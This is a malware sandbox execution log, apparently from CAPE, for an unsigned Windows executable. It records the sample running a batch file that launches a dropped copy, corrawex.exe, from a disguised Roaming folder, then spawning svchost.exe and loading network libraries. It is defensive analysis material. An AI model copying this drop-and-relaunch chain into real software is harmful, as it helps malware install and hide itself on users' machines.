Analysis

Category: FILE
Package: exe
Started: 2020-03-24 09:43:03
Completed: 2020-03-24 09:46:45
Duration: 222 seconds

Options:
route = internet
procdump = 1

Log:
2020-03-24 09:43:03,000 [root] INFO: Date set to: 03-24-20, time set to: 09:43:03, timeout set to: 200
2020-03-24 09:43:03,015 [root] DEBUG: Starting analyzer from: C:\sdijqg
2020-03-24 09:43:03,015 [root] DEBUG: Storing results at: C:\RMoLMdOT
2020-03-24 09:43:03,015 [root] DEBUG: Pipe server name: \\.\PIPE\zaxaupWeDT
2020-03-24 09:43:03,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-03-24 09:43:03,015 [root] INFO: Automatically selected analysis package "exe"
2020-03-24 09:43:03,342 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:43:03,342 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:43:03,342 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:43:03,561 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:43:03,561 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:43:03,561 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-03-24 09:43:03,561 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-03-24 09:43:03,576 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe" with arguments "" with pid 920
2020-03-24 09:43:03,576 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:43:03,576 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:43:03,608 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:43:03,608 [root] DEBUG: Loader: Injecting process 920 (thread 1876) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:43:03,608 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:43:03,608 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 920
2020-03-24 09:43:05,619 [lib.api.process] INFO: Successfully resumed process with pid 920
2020-03-24 09:43:05,619 [root] INFO: Added new process to list with pid: 920
2020-03-24 09:43:05,730 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:43:05,730 [root] DEBUG: Process dumps enabled.
2020-03-24 09:43:05,760 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 920 at 0x74940000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:43:05,760 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe".
2020-03-24 09:43:05,760 [root] INFO: Monitor successfully loaded in process with pid 920.
2020-03-24 09:43:05,792 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:43:06,056 [root] DEBUG: set_caller_info: Adding region at 0x03A70000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:43:06,056 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:43:06,072 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:43:06,072 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:44:52,371 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:44:52,434 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:44:52,448 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:44:52,448 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:44:52,448 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:52,512 [root] DEBUG: DLL loaded at 0x74A30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:44:52,526 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:44:52,542 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:44:52,558 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:44:52,635 [root] INFO: Announced 32-bit process name: cmd.exe pid: 332
2020-03-24 09:44:52,635 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,635 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,651 [root] DEBUG: Loader: Injecting process 332 (thread 1964) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:52,651 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 332
2020-03-24 09:44:52,651 [root] INFO: Announced 32-bit process name: cmd.exe pid: 332
2020-03-24 09:44:52,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,651 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,651 [root] DEBUG: Loader: Injecting process 332 (thread 1964) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:52,651 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 332
2020-03-24 09:44:52,651 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x74A30000.
2020-03-24 09:44:52,667 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:52,667 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x74400000.
2020-03-24 09:44:52,667 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 920
2020-03-24 09:44:52,667 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:52,667 [root] DEBUG: GetHookCallerBase: thread 1876 (handle 0x0), return address 0x0040112D, allocation base 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:44:52,667 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:52,667 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 332 at 0x74940000, image base 0x4abc0000, stack from 0x233000-0x330000
2020-03-24 09:44:52,667 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"".
2020-03-24 09:44:52,667 [root] INFO: Added new process to list with pid: 332
2020-03-24 09:44:52,667 [root] INFO: Monitor successfully loaded in process with pid 332.
2020-03-24 09:44:52,667 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\920_57155088812251824232020
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:44:52,683 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2576
2020-03-24 09:44:52,683 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,683 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,683 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,683 [root] DEBUG: Loader: Injecting process 2576 (thread 2572) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,683 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,683 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,683 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:52,683 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,698 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2576
2020-03-24 09:44:52,698 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:52,698 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:44:52,698 [root] DEBUG: DLL unloaded from 0x74870000.
2020-03-24 09:44:52,698 [root] INFO: Notified of termination of process with pid 920.
2020-03-24 09:44:52,713 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2576
2020-03-24 09:44:52,713 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,713 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,730 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,730 [root] DEBUG: Loader: Injecting process 2576 (thread 2572) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,746 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,760 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,776 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:52,776 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,776 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2576
2020-03-24 09:44:52,792 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:52,792 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:52,808 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:52,823 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:52,838 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2576 at 0x74940000, image base 0x4abc0000, stack from 0xb3000-0x1b0000
2020-03-24 09:44:52,869 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"".
2020-03-24 09:44:52,901 [root] INFO: Added new process to list with pid: 2576
2020-03-24 09:44:52,901 [root] INFO: Monitor successfully loaded in process with pid 2576.
2020-03-24 09:44:52,933 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 948
2020-03-24 09:44:52,947 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,947 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,947 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,963 [root] DEBUG: Loader: Injecting process 948 (thread 416) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,963 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:44:52,994 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,994 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:53,026 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,026 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 948
2020-03-24 09:44:53,026 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:53,026 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 948
2020-03-24 09:44:53,026 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:53,026 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:53,058 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:53,072 [root] DEBUG: Loader: Injecting process 948 (thread 416) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,088 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:44:53,088 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,088 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:53,119 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,119 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 948
2020-03-24 09:44:53,119 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:53,151 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:53,181 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:53,181 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:53,181 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 948 at 0x74940000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:44:53,213 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE".
2020-03-24 09:44:53,213 [root] INFO: Added new process to list with pid: 948
2020-03-24 09:44:53,213 [root] INFO: Monitor successfully loaded in process with pid 948.
2020-03-24 09:44:53,213 [root] DEBUG: DLL loaded at 0x74A10000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:44:53,526 [root] DEBUG: set_caller_info: Adding region at 0x039E0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:44:53,572 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:44:53,588 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:44:53,588 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:45:22,604 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:45:22,634 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,651 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,667 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,667 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,681 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,697 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,729 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:45:22,744 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,744 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2092
2020-03-24 09:45:22,759 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:45:22,776 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,776 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,776 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,790 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,790 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,806 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,806 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,822 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:45:22,822 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,822 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2092
2020-03-24 09:45:22,901 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:45:22,915 [root] DEBUG: Process dumps enabled.
2020-03-24 09:45:22,931 [root] INFO: Disabling sleep skipping.
2020-03-24 09:45:22,963 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:45:22,963 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,963 [root] WARNING: Unable to hook LockResource
2020-03-24 09:45:22,963 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,963 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,963 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,963 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,963 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,963 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:45:22,979 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:45:22,979 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2092 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x00000000001E5000-0x00000000001F0000
2020-03-24 09:45:22,979 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:45:22,979 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2020-03-24 09:45:22,993 [root] INFO: Added new process to list with pid: 2092
2020-03-24 09:45:22,993 [root] INFO: Monitor successfully loaded in process with pid 2092.
2020-03-24 09:45:23,088 [root] DEBUG: set_caller_info: Adding region at 0x0000000000120000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:23,088 [root] DEBUG: DLL loaded at 0x0000000003600000: C:\sdijqg\dll\YohPbkoy (0xd8000 bytes).
2020-03-24 09:45:23,088 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:23,134 [root] DEBUG: DLL unloaded from 0x0000000003600000.
2020-03-24 09:45:23,180 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2020-03-24 09:45:23,180 [root] DEBUG: InjectDll: DLL injection via thread failed.
2020-03-24 09:45:23,180 [root] DEBUG: Failed to inject DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:23,213 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 2092, error: -8
2020-03-24 09:45:23,243 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2020-03-24 09:45:23,243 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 948
2020-03-24 09:45:23,243 [root] DEBUG: GetHookCallerBase: thread 416 (handle 0x0), return address 0x0040112D, allocation base 0x00400000.
2020-03-24 09:45:23,243 [root] DEBUG: set_caller_info: Adding region at 0x0000000000170000 to caller regions list (ntdll::NtProtectVirtualMemory).
2020-03-24 09:45:23,243 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 09:45:23,243 [root] DEBUG: set_caller_info: Adding region at 0x0000000037610000 to caller regions list (kernel32::HeapCreate).
2020-03-24 09:45:23,243 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:45:23,259 [root] DEBUG: set_caller_info: Adding region at 0x00000000003A0000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:23,259 [root] DEBUG: set_caller_info: Adding region at 0x00000000036B0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:23,259 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\948_99719373343251824232020
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:45:23,275 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,275 [root] INFO: Notified of termination of process with pid 948.
2020-03-24 09:45:23,275 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2576
2020-03-24 09:45:23,275 [root] DEBUG: GetHookCallerBase: thread 2572 (handle 0x0), return address 0x4ABC7302, allocation base 0x4ABC0000.
2020-03-24 09:45:23,275 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4ABC0000.
2020-03-24 09:45:23,290 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,290 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x4ABC0000.
2020-03-24 09:45:23,290 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
2020-03-24 09:45:23,305 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\2576_165130777223251824232020
2020-03-24 09:45:23,305 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x48200.
2020-03-24 09:45:23,305 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,305 [root] INFO: Notified of termination of process with pid 2576.
2020-03-24 09:45:23,305 [root] DEBUG: set_caller_info: Adding region at 0x00000000001F0000 to caller regions list (advapi32::RegCloseKey).
2020-03-24 09:45:23,322 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:45:23,322 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:45:23,322 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 332
2020-03-24 09:45:23,322 [root] DEBUG: GetHookCallerBase: thread 1964 (handle 0x0), return address 0x4ABC7302, allocation base 0x4ABC0000.
2020-03-24 09:45:23,322 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4ABC0000.
2020-03-24 09:45:23,322 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,336 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x4ABC0000.
2020-03-24 09:45:23,352 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
2020-03-24 09:45:23,352 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2020-03-24 09:45:23,352 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2020-03-24 09:45:23,352 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\332_15641567423251824232020
2020-03-24 09:45:23,352 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x48200.
2020-03-24 09:45:23,368 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,368 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:23,368 [root] INFO: Notified of termination of process with pid 332.
2020-03-24 09:45:23,368 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC890000: C:\Windows\system32\mswsock (0x55000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:45:23,400 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:45:23,400 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2020-03-24 09:45:23,414 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2020-03-24 09:45:23,414 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
